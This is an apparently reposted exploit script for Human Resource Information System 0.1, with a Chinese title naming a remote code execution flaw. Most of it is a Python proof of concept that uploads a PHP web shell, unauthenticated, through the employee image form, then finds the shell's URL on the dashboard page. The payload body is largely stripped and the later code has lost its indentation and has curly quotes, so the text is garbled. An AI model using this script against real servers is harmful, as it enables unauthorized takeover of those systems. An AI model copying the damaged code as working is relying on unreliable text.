Human_Resource_Information_System_0.1_遠程代碼執行漏洞

# Human Resource Information System 0.1 遠程代碼執行漏洞
==EXP==

# Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)
# Date: 04-05-2021
# Exploit Author: Reza Afsahi
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html
# Software Download: https://www.sourcecodester.com/download-code?nid=14714&title=Human+Resource+Information+System+Using+PHP+with+Source+Code
# Version: 0.1
# Tested on: PHP 7.4.11 , Linux x64_x86

############################################################################################################

# Description:
# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.

############################################################################################################

# Proof of concept:

#!/usr/bin/python3

import requests
import sys
from bs4 import BeautifulSoup

def find_shell(domain):
    req_2 = requests.get(domain + "/Admin_Dashboard/Add_employee.php")
    soup = BeautifulSoup(req_2.content , "html.parser")
    imgs = soup.find_all("img")
    for i in imgs:
        src = i['src']
        if ("shell.php" in src):
            print(" [!] Your shell is ready :) ==> " + domain + "/Admin_Dashboard/" + src + "\n")
            break
        else:
            continue

def upload_file(domain):

    print("\n [!] Uploading Shell . . .")
    payload =  """ 
    


	


	

		
		


		
	
{$result}

“;

?>


“””

h = {
“Content-Type” : “multipart/form-data”
}

f = {’employee_image’:(‘shell.php’,payload,
‘application/x-php’, {‘Content-Disposition’: ‘form-data’}
)
}
d = {
“emplo” : “”,
“employee_companyid” : “test”,
“employee_firstname” : “test”,
“employee_lastname” : “test”,
“employee_middlename” : “test”,
“branches_datefrom” : “0011-11-11”,
“branches_recentdate” : “2222-11-11”,
“employee_position” : “test”,
“employee_contact” : “23123132132”,
“employee_sss” : “test”,
“employee_tin” : “test”,
“employee_hdmf_pagibig” : “test”,
“employee_gsis” : “test”
}
url = domain + “/Admin_Dashboard/process/addemployee_process.php”
req = requests.post(url , data=d , files = f)
if req.status_code == 200:
if (“Insert Successfully” in req.text):
print(“\n [!] Shell uploaded succefully\n”)
find_shell(domain)

else:
print(“Exploit Failed 1”)

def main():
if len(sys.argv) != 2:
print(‘[!] usage: %s ‘ % sys.argv[0])
print(‘[!] eg: %s http://vulndomain.com’ % sys.argv[0])
sys.exit(-1)

print(“<><><><><><><><><><><><><><><><><><><><><><><><>“)
print(“<> Human Resource Information System <>“)
print(“<> Shell Uploader <>“)
print(“<><><><><><><><><><><><><><><><><><><><><><><><>“)
target_domain = sys.argv[1]
upload_file(target_domain)

if __name__ == “__main__”:
main()